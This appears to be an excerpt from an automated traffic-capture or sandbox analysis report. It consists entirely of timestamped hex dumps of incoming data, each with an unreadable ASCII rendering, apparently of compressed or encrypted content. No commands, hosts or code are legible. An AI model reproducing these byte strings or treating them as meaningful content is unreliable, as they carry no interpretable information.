                                                                                                                                                    2022-09-29 12:59:02 UTC5153INData Raw: e2 e3 55 ce 6d f5 37 f6 52 1c 88 fe 96 e5 78 28 cd 93 92 a0 ef c8 d1 64 db 20 b3 23 64 a2 4b fc 64 52 27 cb da 13 95 35 a6 03 dd 18 5f 87 72 04 26 fc e6 17 e1 6e 28 9d 26 10 4f 1a 68 0f dc 5e 86 92 92 76 63 3b 6a 6d 98 3d b6 34 62 4f f0 89 e3 70 42 d3 93 d3 ee 35 37 32 e5 0f 0f 97 17 d5 00 56 da 25 3c ad 54 a8 00 46 66 13 13 6d c4 4d cd 74 1c 01 42 e0 e9 69 78 8f 06 c8 08 a8 1f a1 92 b3 46 5c 9a b9 32 84 45 7b ba a1 85 51 b9 60 42 c5 a2 c4 70 eb c9 44 09 ec eb 58 01 70 0d 34 11 36 ba 1a 96 93 a6 58 f5 b1 eb 38 6a 46 46 97 4b 78 80 2a e7 b2 60 20 34 f3 c4 4e ae a3 51 84 62 b9 99 93 02 62 6d 0e 6b 10 9e 2b 02 d8 4b 9c 38 64 e4 91 95 92 b4 66 55 8f 42 66 be 01 83 1c 6b fc 8d 79 57 0d 4e c6 ed f8 d4 c6 c4 d7 a9 9e f8 7e 62 37 f2 43 dd 33 43 6d 60 0e 7a bb 43
                                                                                                                                                    Data Ascii: Um7Rx(d #dKdR'5_r&n(&Oh^vc;jm=4bOpB572V%<TFfmMtBixF\2E{Q`BpDXp46X8jFFKx*` 4NQbbmk+K8dfUBfkyWN~b7C3Cm`zC
                                                                                                                                                    2022-09-29 12:59:02 UTC5169INData Raw: 29 00 fe 78 2c c3 2d a0 06 ab b6 37 40 dc 15 7d ea f7 47 f2 38 0e 9e 17 ea e9 a8 e2 b4 09 90 bb 37 03 6e 3f 15 f5 1c 54 a3 67 6e 2e 26 a0 cf 0e 63 7a ce 89 61 a1 62 a9 32 2d 1d f5 ae ad 86 a2 a3 cd 2f 00 90 26 f9 12 1e ff eb b7 86 ff d8 0e 44 d2 ad ae e6 07 91 db 96 47 de 5c f0 dd 02 7f b5 b1 19 e2 80 68 4f bf d1 7f 36 e3 3e be 68 50 04 c1 02 f2 43 f7 c2 72 4d 89 e1 b3 da 4a 11 07 9c 23 16 02 0b 51 4a 51 9a 64 bc 05 05 9d 52 0b b3 11 1f 3d 91 e2 84 59 47 b4 41 d7 de 2f c9 10 ee be af 9a 9f 6f 2b 77 9d 16 17 7c 1a 9d 2d e2 d8 98 ce 9a 77 4c 01 e3 30 06 5f 8c d2 46 fb 13 f8 62 e7 cd b1 e4 ea e8 d0 e6 22 8f ab 8e 6f 86 01 43 25 ec c5 b3 3e 69 8b c7 7e aa 36 ae be 32 2b c8 8b 36 b0 fd f0 2a 86 8a 71 3a 6f a2 55 17 b9 38 83 33 32 1e e6 a0 f4 4f 9e 21 d7 d5 c9
                                                                                                                                                    Data Ascii: )x,-7@}G87n?Tgn.&czab2-/&DG\hO6>hPCrMJ#QJQdR=YGA/o+w|-wL0_Fb"oC%>i~62+6*q:oU832O!
                                                                                                                                                    2022-09-29 12:59:02 UTC5185INData Raw: 8b ae 56 c3 02 12 11 ef 9b b3 3c 26 fd 93 47 8a 28 8c b3 c0 79 81 71 81 86 7f 98 a8 e2 6b dd bf 25 85 01 80 ce e6 cf 21 bf 77 d5 04 24 b9 f5 6c 3c e7 f5 b1 7d b1 07 4f de 02 78 1b be a4 35 37 7c 74 94 14 20 c7 4d 4a a7 c7 85 a1 12 76 3c e2 47 e4 a7 e3 cf a4 0a 04 ea 67 ff 7c e3 44 5f d4 cc 52 7e a8 b3 bf 16 af b8 13 08 3f ca 68 45 16 36 a0 ea db 03 04 a7 ab 66 25 be ff 49 c6 71 23 49 96 e8 fc 17 a6 29 6b 58 b2 d7 0e a7 8c 2d ea d5 f9 8e 9a 19 58 6b a3 63 fa 20 c7 b2 ef e3 fc 32 49 8f 39 0c 63 fd 75 ff 7f 25 00 ea a9 50 a9 ea d9 a2 42 31 88 30 a6 0d dd 8a 04 0c 67 b6 b3 97 59 21 d5 c1 60 37 ab 7b 60 22 d5 52 4d 92 a6 c3 8e c7 8d 17 f9 8c 29 7d aa 50 7d 4e 16 86 0b 71 af 4d 6b 36 8d f3 a4 5b 5f cf 60 2b 39 cd 2f 5b 28 18 7b 01 05 53 39 d5 48 9b 78 9a de 0c
                                                                                                                                                    Data Ascii: V<&G(yqk%!w$l<}Ox57|t MJv<Gg|D_R~?hE6f%Iq#I)kX-Xkc 2I9cu%PB10gY!`7{`"RM)}P}NqMk6[_`+9/[({S9Hx
                                                                                                                                                    2022-09-29 12:59:02 UTC5201INData Raw: b6 ad b5 de d7 a1 ef 43 e3 75 df 36 22 ce 39 fb da 22 2d e4 2b 88 02 28 80 08 13 b3 3e 2e 8f cd b9 ed 51 d5 d5 e7 59 ca 05 cd e0 b0 63 0e 60 2f a8 d8 00 0c 53 dc fa 61 cc 50 4c f2 72 60 79 8b 9c 50 81 2e 2f 88 4b c2 90 7e 24 d4 ed 74 b3 d8 3c 7e c4 63 83 93 55 4b af b1 5b 68 ad 60 54 27 cf 18 c1 2d e4 75 8d 4a 0c a2 3f 1c 76 f2 f5 8f 01 29 46 16 76 9b 46 f2 2a 36 36 24 68 c7 75 10 49 a6 59 49 89 b0 42 90 a7 eb be 36 1c f6 f3 d1 5d 03 7c 84 0e 3f 40 97 e9 8d 41 5c 2d 5e fd 62 ac 10 07 f7 dc bb e8 3b 7d ae 6d ec 2a f8 38 aa 6b 9d b8 80 12 a5 49 6d aa 59 54 17 b7 fa c6 12 ce 6d 52 28 6a fd c5 bc f9 93 33 a4 e0 0a 03 ec 29 a4 57 4f 39 f0 6a c8 6d 6c 64 ab 40 cd 6c ec 8d 30 95 14 8a 66 96 af 24 11 bb 93 da a5 1a eb b4 87 7d 43 63 be 9d 27 f1 4e 3e c0 3a 62 14
                                                                                                                                                    Data Ascii: Cu6"9"-+(>.QYc`/SaPLr`yP./K~$t<~cUK[h`T'-uJ?v)FvF*66$huIYIB6]|?@A\-^b;}m*8kImYTmR(j3)WO9jmld@l0f$}Cc'N>:b
                                                                                                                                                    2022-09-29 12:59:02 UTC5217INData Raw: ec ac fa ac 2d bf 62 8e a0 84 51 ca a7 e1 79 c0 f0 4d aa bb 38 4a 17 28 11 76 95 c6 bd d4 37 9d a4 ed 57 df 50 35 45 f3 16 fa 9e 1d 85 bc de 85 05 0b fd 0f 82 d3 24 e8 10 6c 28 02 a5 5f 64 4f d9 47 85 6a 2c 92 e4 eb 77 2f 22 91 f5 44 10 67 57 ab ca 8b 51 07 f2 6f c7 5d 8c 63 81 f2 72 df 65 6f fb 3a 16 7f 6a f2 8d 54 a1 2c a2 7a cf be a4 79 63 fa 93 fa dd 3c a7 c0 c6 e3 09 66 5e 0a fe d1 37 79 dc 1d 16 d6 92 47 7c 0a 60 30 dc ae ba a4 d8 63 2c 8f e3 71 79 60 a7 26 fa 1a f6 64 d1 3f 0c 59 7a 4b 70 65 0c e4 0f 10 e9 e3 20 c9 f3 27 6a ed ab 42 49 31 9b a2 af bd 2b 4c 7e dd 26 28 5d 23 dc 3c 44 60 e0 d7 08 c2 35 28 61 2d 1a c2 f7 ff e8 0f 02 90 a8 e2 34 8b 36 34 a3 4a 98 3d 88 73 da f6 da 24 fe 66 49 2d b3 ed ab 91 ac 14 3c 71 91 7c 65 cd d1 5d 6d a2 db 3c 56
                                                                                                                                                    Data Ascii: -bQyM8J(v7WP5E$l(_dOGj,w/"DgWQo]creo:jT,zyc<f^7yG|`0c,qy`&d?YzKpe 'jBI1+L~&(]#<D`5(a-464J=s$fI-<q|e]m<V
                                                                                                                                                    2022-09-29 12:59:02 UTC5233INData Raw: 5e e7 e2 b2 6a bc 1f 3f c6 90 08 2f 9e 27 11 26 55 77 ee 30 38 43 96 ff 46 e3 e5 5d b9 93 65 e9 86 f8 02 75 cd 58 de 1e 9c fa a1 14 e5 6c af 77 00 cf 32 83 ce 34 d8 b5 0e 77 17 52 de e9 f5 a3 9e ec 38 91 dc bb 0d e6 47 97 83 67 35 be 1f 67 b4 e2 d4 09 8d e4 0c c0 af 09 82 6c 57 af e1 bb 6c e2 79 e5 6a 78 0d bd 3a 3b 03 7e f8 d3 a7 fa 94 f8 e7 70 88 fa 22 10 ea 6b b4 a1 37 70 b0 92 53 66 8c 99 b3 81 26 df 6a ad 90 ff 96 61 79 c2 2a 8f 99 92 0a 77 2f 25 0f b6 78 08 ec b4 da 9e f2 2a 9d 69 7a 27 07 c7 96 dd 1d 92 92 ac 88 3d 47 d7 12 de fc 4c 88 9d dc c5 3d 99 34 7f 15 46 20 52 cd 29 f0 df 96 2b b2 bd 33 a8 f7 b8 9d 30 b5 5d d2 0a 1a a0 31 7f d7 2b 79 09 7b a0 6c 98 0d d5 88 42 9e ae 6b 80 0b 0e 50 8c 89 76 7f 43 b9 58 e5 2f fe 0a 13 70 9b ce 95 17 44 a4 81
                                                                                                                                                    Data Ascii: ^j?/'&Uw08CF]euXlw24wR8Gg5glWlyjx:;~p"k7pSf&jay*w/%x*iz'=GL=4F R)+30]1+y{lBkPvCX/pD
                                                                                                                                                    2022-09-29 12:59:02 UTC5249INData Raw: 79 11 e1 f8 e9 46 d0 bf 03 8b ac 70 ea 88 b1 dc f2 80 d4 96 e9 72 01 d6 e0 e8 52 32 bf 60 39 0d 26 9e b8 18 e8 ac 6f 13 f6 9a 6c a2 08 00 62 3e 17 d2 ec 91 4b 1a da 59 4b a9 d7 b0 82 97 8c 99 a7 90 33 e8 be 81 d0 93 f0 27 3d 96 e8 af d7 44 26 48 ca fd 59 8e 44 95 d7 31 6d 43 67 e4 ed b4 b6 7d dc 6a a8 c3 98 18 d5 32 50 34 48 d8 38 cb 63 b5 99 57 4c 9b 7e ab 14 1f 2d e8 05 74 17 59 de e5 9f 04 84 42 ff 89 a8 ad bd 7c 8f 64 db a6 50 b2 80 c2 d1 0b dd 90 52 84 61 03 b6 52 e0 b6 0d 6a 95 2d 15 16 6e 76 16 2b 39 4c 7e 2e 85 b6 2a 8a 5b 95 91 b5 d7 d8 75 c7 46 32 8a c2 9e 36 f3 72 89 db f5 2f bc 88 e1 30 af 0c d1 96 99 c8 7a 65 50 f2 71 fa 11 5d 48 be da 79 cf e5 14 97 7d d1 ea 54 eb c3 a5 b5 df d2 d8 2c 71 c5 57 48 59 81 44 f0 33 5d c9 df 05 27 98 25 bb 5d b2
                                                                                                                                                    Data Ascii: yFprR2`9&olb>KYK3'=D&HYD1mCg}j2P4H8cWL~-tYB|dPRaRj-nv+9L~.*[uF26r/0zePq]Hy}T,qWHYD3]'%]
                                                                                                                                                    2022-09-29 12:59:02 UTC5265INData Raw: 2d 81 b4 2e 63 50 d7 36 8d 58 9b a5 45 0c 0a 4d c7 77 f9 f7 2e 0d 19 5a 4e 3d 3d cf 63 ca 1f ad 5d fe 60 75 3d 87 91 da 28 2a af e8 5f 14 a4 72 75 11 41 8a e6 1e 88 a6 9b ce f6 9f a4 9c f8 57 bf b5 89 25 f7 ec a4 f8 4e 35 f4 0f 85 8d a7 61 71 79 84 c3 fa 90 37 99 71 c2 eb d9 e5 f2 10 b3 d7 0b 50 24 72 d3 cb 9a fc 6d c6 a7 81 b1 57 b1 6b 84 dd 72 20 88 be 6b 31 b3 c0 87 71 dd 02 06 ea bd 64 fc df 17 1c e1 b4 f5 f2 81 35 f5 2e 24 83 47 b1 cb b1 c3 1a ab 2f d6 ae 3d 24 81 b2 7a 70 bb d6 f8 ca a2 94 d8 eb 1e cf 1a 29 cc 1f e0 92 ab df 98 12 a5 25 ad f5 22 05 3e a9 4f 01 be 1c 48 eb 43 d5 0b 98 a2 f6 86 aa fc a3 31 75 28 ac b2 c7 91 ea 68 88 23 c5 20 81 ad 23 71 06 ad d6 34 52 34 fa a2 58 96 de fe 3f 4f 57 5a 37 80 0c e7 6f c1 77 01 e7 58 5d 7e 16 5a 52 ba 6a
                                                                                                                                                    Data Ascii: -.cP6XEMw.ZN==c]`u=(*_ruAW%N5aqy7qP$rmWkr k1qd5.$G/=$zp)%">OHC1u(h# #q4R4X?OWZ7owX]~ZRj
                                                                                                                                                    2022-09-29 12:59:02 UTC5281INData Raw: 58 d2 ad e4 9c 25 a1 56 4c 6a 01 4e d0 21 f5 18 32 f0 35 eb a3 f3 07 33 4a eb af 63 aa 61 2d 12 33 da f2 19 76 42 e0 4b ee f2 d8 73 2c 2b 5d 91 46 8e 53 ec ad 50 b9 96 45 63 ba 22 7c 0f c8 df 65 98 4f 22 de 59 88 85 74 9b 7a b7 eb f8 f1 ab d7 5d bc 41 62 17 85 92 d4 e2 ae c1 09 e4 9a 5f 45 ef 5e 68 2a db 97 49 0d 5c dc c3 ac 63 2c 96 3d 0f 52 70 61 49 c6 bf 58 8c e4 4a ff 6f c0 ec b9 dd 9c c3 db 32 0e 3b 86 b6 82 92 f6 c0 70 b3 96 47 47 49 a8 5b 18 70 08 24 75 de 17 e1 f5 a8 db 0f 4b 51 b8 0e 2d bd 4e c9 92 c2 6a 67 be d2 62 f4 bc ed 71 3d 44 63 fd c4 8a 0a bf b1 72 87 f6 68 43 35 52 52 ef 0f d9 ea 5c 91 4e 4b 3b 36 59 aa cf 64 60 af a2 13 01 05 c6 eb d0 0c 5d af 6f 21 76 63 68 eb c3 94 bb 78 12 9a 4e 05 db 09 06 ae 4a 43 4a 3d 0c 5f f4 33 4b b0 f9 a2 f9
                                                                                                                                                    Data Ascii: X%VLjN!253Jca-3vBKs,+]FSPEc"|eO"Ytz]Ab_E^h*I\c,=RpaIXJo2;pGGI[p$uKQ-Njgbq=DcrhC5RR\NK;6Yd`]o!vchxNJCJ=_3K
                                                                                                                                                    2022-09-29 12:59:02 UTC5297INData Raw: c0 b3 92 47 3b 0c 11 5c 94 ab 35 f2 09 d8 2d 7e 0b 01 31 6e e3 c7 6b c0 d9 dc e3 23 74 4e ed d9 75 76 d1 c5 40 e2 c3 1d e9 01 4a dd e3 64 f4 85 18 6c e9 61 40 72 8f 75 e2 40 bf cf 25 60 4c 32 b2 79 e8 c1 a0 88 2d 79 57 1d 23 a3 54 cb 9a 46 08 73 48 5c 10 4d df b5 87 ec 62 fc b9 a3 3c 27 a7 99 11 22 99 35 73 b1 88 7c 1c 9a 2e e2 b0 f0 c9 a5 15 09 85 5c cc ca 03 e0 12 a4 dc ca 22 7d 28 86 45 b3 1c 4a 62 34 32 a8 9a a3 35 6a 3a 55 32 ff de d1 3b e9 a6 91 06 4a 2b dd 89 60 c4 12 7e c1 4c b4 8f 98 91 47 cf 49 eb 54 8a ad 0e b4 ff 44 46 65 07 e0 b0 6b 0c d1 87 74 0c 75 c8 b1 e4 f7 f8 11 14 9f af 0d 5e 21 a3 a6 b6 fc 24 fe 9b 63 0f fd 3e de ce 1b d3 e1 20 e2 5b 9c 51 38 86 a2 00 e8 85 22 f1 c3 70 f9 51 da 24 b5 39 90 f7 f6 71 2b 6f e4 75 84 67 fe c3 f4 f2 22 55
                                                                                                                                                    Data Ascii: G;\5-~1nk#tNuv@Jdla@ru@%`L2y-yW#TFsH\Mb<'"5s|.\"}(EJb425j:U2;J+`~LGITDFektu^!$c> [Q8"pQ$9q+oug"U
                                                                                                                                                    2022-09-29 12:59:02 UTC5313INData Raw: 00 1a b3 29 61 65 0f 41 ac 5b ed 46 de f4 8c 05 a0 ff ba e8 90 e3 61 07 91 1f 51 a6 ed 96 86 e5 9c 5e a4 e7 39 2b a0 5f f9 bc fc 91 22 ec 39 9e 69 f9 8f 5f 1f 6e 29 fc a1 60 5d 2a fa 2d c5 34 72 42 f2 d8 3c 6e 4e eb a0 02 f3 fc ca 3b c1 8e a9 41 85 87 8c ae 5d d8 ab 59 4d 84 ac 52 d8 c9 0d 12 78 23 1b 1b 23 e1 e8 73 d9 47 da d4 14 74 ef 95 10 71 5c a3 8c 23 ed 3e 49 b0 82 04 e4 53 97 9e 7b 55 d3 89 17 49 3d e6 d9 7a fb a4 b3 1b 3e e1 e3 48 eb 92 e4 ca 58 56 63 58 58 ce 33 bd d1 01 7b 6d 42 15 0a ab 2a 9c b5 db 20 0c b9 b5 f7 26 11 5f 2b 19 28 49 0b 97 a5 31 58 22 ba ce 88 a9 19 43 11 6b 5a 25 40 ed 58 12 81 00 ca fa 0e 46 27 30 2d af aa cf 33 24 6f 80 3b 4c 6a 83 49 d0 c4 2f f5 0c b6 39 86 50 a6 e3 53 92 fe 83 9a 80 50 be f8 36 5f 48 a2 25 6f b5 e4 ec dd
                                                                                                                                                    Data Ascii: )aeA[FaQ^9+_"9i_n)`]*-4rB<nN;A]YMRx##sGtq\#>IS{UI=z>HXVcXX3{mB* &_+(I1X"CkZ%@XF'0-3$o;LjI/9PSP6_H%o
                                                                                                                                                    2022-09-29 12:59:02 UTC5329INData Raw: 75 71 78 d3 b1 6e 34 60 d3 7e 08 c6 5b 94 dc cf 56 f7 57 fb d2 8c 78 f6 3c 0f c1 2d a4 ab 32 1d 87 64 37 f6 f3 4d 1b 95 df 9e 03 bd 75 1a 8d f0 b2 65 76 d0 41 ed d1 e0 57 30 15 3c ea 8c 44 55 08 e1 2f c0 44 cb 3e 30 85 b9 a9 96 1f 8f ab d1 4e bf dc 8b 47 1e 06 c5 d2 27 18 fd 74 5b fb 09 b2 af 3b 84 63 c3 cc b1 93 c0 ee 8c bc c7 26 5a 5f 59 fe cc f2 8c 8c aa 71 22 19 83 0d 53 a9 0a cb f6 0b c8 64 bb b1 af f6 a0 a7 c7 c0 5c 0d e2 27 63 28 19 1d cb 68 78 61 84 3e c8 91 6a e3 38 8f a1 df ff 4f a6 dc e9 8a 6f ce 84 f8 ae 4b 76 be 88 30 16 86 d4 9a a4 a7 5a b3 30 be 38 44 41 51 a6 d9 8f 63 d6 d5 d3 3d bb 84 b6 99 d8 17 7a cd 80 d2 f7 4a a3 44 72 ab d6 fb dd 8f b1 56 0a e7 22 d2 d9 93 7d ad 66 75 23 7a 0a 4c 26 25 41 20 3a d5 2f c0 ce 6c 88 f3 0b 99 35 4e 5f c9
                                                                                                                                                    Data Ascii: uqxn4`~[VWx<-2d7MuevAW0<DU/D>0NG't[;c&Z_Yq"Sd\'c(hxa>j8OoKv0Z08DAQc=zJDrV"}fu#zL&%A :/l5N_
                                                                                                                                                    2022-09-29 12:59:02 UTC5345INData Raw: 02 51 8f 8f d8 29 53 2e bd 28 42 70 4c 31 07 42 0d 85 9d 35 8e a0 68 52 27 63 8a 97 fb 26 05 29 29 13 ef 7a ea 94 40 eb d2 d1 07 60 21 b3 13 b8 87 05 94 9e 32 fe 32 d3 fb 29 da f7 1b c2 45 e6 cf d4 c3 7d ea ac 99 85 03 50 a8 88 81 e0 9f ae 82 55 04 bf b2 50 2b e2 d4 94 ee 9f 24 36 87 29 32 d1 e1 14 46 fa e0 4f c4 9a 11 8c ae 2f 62 68 d2 a1 f6 a7 7f da 50 d6 a5 87 f6 61 3d 09 6b 8b 76 17 ab d8 6d c3 b3 65 d8 55 dd 7e e7 60 43 98 39 4a 6a 1e 09 c5 b9 57 11 95 74 da 35 6f e8 9b 77 08 33 84 a2 13 f3 4e 25 62 a7 b3 e6 8d 1b 82 6b 56 71 13 ad 80 d2 a8 0e 90 31 4d a6 e2 72 52 9a 7d 12 af 29 14 39 bf 65 0a 48 9f e2 ee cb f5 a7 6d 62 ef 46 d0 fc df e1 1c d6 d7 46 de 42 33 bc c4 a8 ab 65 8a 9f e7 94 ef 07 4f fb 4c 3a e9 db 4d 8d 0b 51 2c 4c 2d fb 20 65 cf 1c d2 ed
                                                                                                                                                    Data Ascii: Q)S.(BpL1B5hR'c&))z@`!22)E}PUP+$6)2FO/bhPa=kvmeU~`C9JjWt5ow3N%bkVq1MrR})9eHmbFFB3eOL:MQ,L- e
                                                                                                                                                    2022-09-29 12:59:02 UTC5361INData Raw: 39 0a c5 95 63 c1 f6 00 e3 c8 de 4e 6a eb 96 df 16 62 7b 2f 7f f9 14 2c 48 b9 28 84 89 6c d4 eb a3 9d fa 6c d0 8a ee a3 4c 01 f7 28 10 ad 0a 3f 00 b5 d3 21 3a 64 79 8d 81 78 17 0f e5 a9 58 3a 5f 88 7b a5 32 ec 8c c7 a6 b6 9e 16 4b 05 81 03 26 f9 2c 52 c9 16 f7 f3 85 e7 b1 42 1b 31 e1 b3 82 2b 4f 5a bf af a2 28 2a 1f 9a 6e 64 a0 7c e8 e6 7f 64 46 cb 2a bd 6e 71 d8 c8 b3 d3 96 a0 53 b1 47 32 d1 cd 3e 8d 06 ae c0 1c a3 81 d4 86 23 19 af 5f e4 cf db aa 25 43 d9 2d 97 5a bb e9 e2 9f 24 48 a1 cb f6 08 23 c2 7b 27 fc 6b a5 03 31 e8 6a c6 ce 59 19 07 43 77 a5 3f 8f 81 c4 d5 bd 7e 49 7c 77 55 54 50 2b 1a 86 fd 18 8f f6 03 87 de b8 4d 35 4c f7 a8 9a 34 52 ec bc 22 dd c1 d7 96 36 10 27 e6 a3 85 86 1f 3c 94 7b 27 c9 67 fb 70 67 64 c0 d2 82 86 04 d6 eb e2 e7 5e 77 2a
                                                                                                                                                    Data Ascii: 9cNjb{/,H(llL(?!:dyxX:_{2K&,RB1+OZ(*nd|dF*nqSG2>#_%C-Z$H#{'k1jYCw?~I|wUTP+M5L4R"6'<{'gpgd^w*
                                                                                                                                                    2022-09-29 12:59:02 UTC5377INData Raw: 94 c6 87 dd c8 c6 be 9c 75 1b ec af 2d f9 b3 2b 70 67 fd 9c 6e 0d 8b 39 5e f2 fe a6 e2 2a 9c 93 95 62 99 fe 87 c8 df dc 49 c6 91 14 c0 f7 e8 fc e9 a5 cd c2 46 1e 2f 96 73 5c 21 ac 15 fd 2f 8f 2e 1a c9 7d 78 7c 43 d6 b2 20 da aa c3 03 95 60 71 70 e9 ba c8 34 0a 58 a9 2c e0 0d 4d db b0 85 22 ad 8f 07 ce 62 a5 a1 7e 80 fe 99 00 9f 07 a4 cb bc d8 20 e8 2a 3c b7 4f 3d 5d cb c7 53 e6 23 57 45 7f 60 a3 9f 8b 56 64 12 22 ad 2e 54 b9 04 65 da 86 67 b5 03 e1 d3 f5 a5 c1 e8 1f 38 49 16 76 70 5d a1 5b 89 55 2d 79 44 de 63 90 3c d0 42 a0 97 22 c8 26 89 d2 30 c9 96 81 f3 ea 92 d1 17 d3 d6 6f 4f e6 8b fc fc e0 d5 b2 51 3d 25 dc 59 6a 84 12 b2 dd 02 02 e6 63 62 ee f0 4a a6 c1 a7 17 57 16 d4 be ce 47 02 ab 06 ea e1 a8 5d 1c c2 13 c7 1c 15 dc f8 d8 f8 91 83 9c 7d ff 7a 0c
                                                                                                                                                    Data Ascii: u-+pgn9^*bIF/s\!/.}x|C `qp4X,M"b~ *<O=]S#WE`Vd".Teg8Ivp][U-yDc<B"&0oOQ=%YjcbJWG]}z
                                                                                                                                                    2022-09-29 12:59:02 UTC5393INData Raw: b2 20 12 c7 ad 5f 39 30 90 62 f3 33 34 77 54 92 a2 33 f6 14 21 de 12 c6 bf 02 d0 03 93 53 72 39 41 bb 55 78 e0 bd fd b4 ca d2 47 26 cb c8 1f e3 b2 63 0f 17 27 e2 de c9 1e 1f f1 b3 43 79 7d d2 9f f0 ee 21 ae 0f 95 47 e4 97 14 a1 a2 8e 30 2a f0 ce 07 74 7b c7 ae 12 f4 4c 53 f7 c0 07 d2 72 16 dd d1 b4 20 19 5d d8 90 51 64 f7 ba 16 d1 a8 3d 62 c5 36 3d cd 9f 33 ca f8 70 ca a0 a0 93 05 2c 53 79 2c e0 2e 42 69 d5 46 b7 21 ae 10 f8 6a 2e 74 2b 7e cf b8 5d 0f b5 98 b4 8c 4a f2 8e 66 f5 ac 5a 31 b0 87 76 6c 8c 75 23 f1 0e 42 d8 01 38 39 95 a2 52 6f 3d 9c 57 63 32 b4 3a dc ff 18 51 ba 19 0b c6 08 a6 09 86 75 4d d6 e8 4e 60 c9 6d e1 b2 53 5c 27 0f a5 2e 8d 1a 56 48 84 c7 7a 69 8d 0b 56 67 b3 4b 5e 85 c0 a5 92 8c db 68 95 68 ed 82 2a cc 07 b1 72 9f 93 b3 2f e7 5b 0f
                                                                                                                                                    Data Ascii: _90b34wT3!Sr9AUxG&c'Cy}!G0*t{LSr ]Qd=b6=3p,Sy,.BiF!j.t+~]JfZ1vlu#B89Ro=Wc2:QuMN`mS\'.VHziVgK^hh*r/[
                                                                                                                                                    2022-09-29 12:59:02 UTC5409INData Raw: 3b f8 58 2e 70 d9 26 d8 2d 94 07 e3 60 b2 74 8d 55 f6 1c 90 42 41 13 d5 d9 4a a7 ff 62 e0 ee 6b a4 b4 94 6a 0b 74 89 3e 56 40 e0 bb 7e 86 f6 31 d5 b5 83 49 5a 25 80 99 d9 12 79 29 f6 7f 82 72 1c 41 6a 3c d3 40 52 82 42 ac 2b d0 8e a8 67 f8 b3 4f 3b 42 15 8f 25 ec c2 34 0d 4f 1a 4d ac 72 3a 2b 7d 8e 5d fe 28 f4 dd 74 75 d3 28 a3 3e 43 c7 b1 a6 18 bf 7e 76 af 7e 58 67 da db 75 97 3b ec 4b f7 04 1b aa 00 55 82 c6 12 c8 78 a9 26 85 43 6b 11 00 b6 25 21 70 83 91 c3 5a 6b 45 31 e2 ad 9a 99 00 70 2e 97 8f fd 68 e9 0d 95 ac c3 8d 19 dd e8 e4 7b 93 84 19 5f 7f ab 25 25 99 de f8 df f0 e2 ec 21 c9 47 69 30 8b fe 58 ac e4 09 f6 7a 5c 8d 34 96 d1 81 1b e9 6a bf b0 4b cc 75 9a 79 7c cf 09 2f 86 e0 bf fc cb 9e 15 b7 99 d2 b3 71 2e ff 31 f7 95 72 ed ef 98 46 3c b9 59 13
                                                                                                                                                    Data Ascii: ;X.p&-`tUBAJbkjt>V@~1IZ%y)rAj<@RB+gO;B%4OMr:+}](tu(>C~v~Xgu;KUx&Ck%!pZkE1p.h{_%%!Gi0Xz\4jKuy|/q.1rF<Y
                                                                                                                                                    2022-09-29 12:59:02 UTC5425INData Raw: fa 63 63 49 78 04 51 92 38 91 9a f1 f3 ca e4 9e b3 8f e6 2b e2 25 e0 26 87 b6 e3 30 3b 81 2e 95 2d 1f b9 02 47 ea 85 4d f2 fb 6f b5 95 2d 30 a8 b8 a7 b4 90 8c 69 9d 09 ba 10 9f d6 e2 43 7f 1b a4 08 1b df bd 3c 7f e7 7a 48 12 c6 4a 7e 6e fd 2b cb ca 46 f6 fb 20 c4 8a c4 cf a7 46 55 dd 11 5e 86 fd 9a 60 db 14 e6 3c e9 e8 30 e1 0e 08 72 77 1c f8 18 ab cb 27 4c 9b a2 a0 18 0a 27 42 da bc bb e4 bd a9 5d f4 0e 31 f2 80 c1 f2 8b 20 5e 53 82 c2 62 9f 21 fe 47 12 47 b0 3d 71 40 00 e0 a0 b1 e4 bb 24 a8 ad 45 45 36 2e fe 78 83 97 b8 42 ff 9f 7e b9 f2 0e 9e 76 46 a7 1b 6d 14 9b 10 5f 6d e0 84 81 47 4f a6 fe 28 6b f2 3e 5a 71 70 03 57 f3 d5 d3 51 6a 49 ed 76 43 a7 67 3b 70 82 1b f6 7f 8b 11 1d ca b7 e7 54 4e c9 9d 60 af 29 69 9e 33 6e da f5 85 5d 76 1f 57 c2 f6 33 da
                                                                                                                                                    Data Ascii: ccIxQ8+%&0;.-GMo-0iC<zHJ~n+F FU^`<0rw'L'B]1 ^Sb!GG=q@$EE6.xB~vFm_mGO(k>ZqpWQjIvCg;pTN`)i3n]vW3
                                                                                                                                                    2022-09-29 12:59:02 UTC5441INData Raw: 9d ad 4d fa 37 7a 0e c7 f2 00 b3 40 17 a3 9c d9 5e 22 89 2e 8b 49 80 75 55 da 8d 1d fb 3b c6 2e 6f 78 48 62 b0 af f5 6d da ec a0 d5 2d 47 41 c0 67 b6 10 68 91 7d bc b2 37 07 38 09 fc 7d 97 8a 9e c1 5a 48 ad e4 4a 8e 02 f7 2a 7d f7 66 af b7 38 9d 5b a6 62 5f 9d c5 e4 03 f6 9e 8f d8 b5 9b 00 cb a4 0b 43 44 6b fa fe 38 ee 36 53 99 e2 5c 88 ee b1 34 58 16 9f bc 3a 78 70 01 15 7e 18 32 eb 5e b0 b5 ac 8e df 21 be 50 33 4f 3b 48 e4 59 61 89 1e 7f 6a 66 b3 0a 93 b5 81 28 c7 f8 67 03 8e 89 19 32 f2 be be 12 ce 3a 51 6e 99 f5 11 0a 0c 03 26 fb 96 31 67 45 07 d8 af f6 11 57 fc 03 36 85 fe 87 bd 0e 57 4c 45 0a 0b 48 c4 3e 3e c1 72 ac 29 54 b6 68 33 ad 16 78 cd 57 ee 0b 7c 85 ef d8 f2 a1 5b 18 5e f2 05 35 20 c0 d2 0b 79 fd 54 a4 ff 03 71 c7 af 3e 86 8c 77 2f 43 74 3c
                                                                                                                                                    Data Ascii: M7z@^".IuU;.oxHbm-GAgh}78}ZHJ*}f8[b_CDk86S\4X:xp~2^!P3O;HYajf(g2:Qn&1gEW6WLEH>>r)Th3xW|[^5 yTq>w/Ct<
